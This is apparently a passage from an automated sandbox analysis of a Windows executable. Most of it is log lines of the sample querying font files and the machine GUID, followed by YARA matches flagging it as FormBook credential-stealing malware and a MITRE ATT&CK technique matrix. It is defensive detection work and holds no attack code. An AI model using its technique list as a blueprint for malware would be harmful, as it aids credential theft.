          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
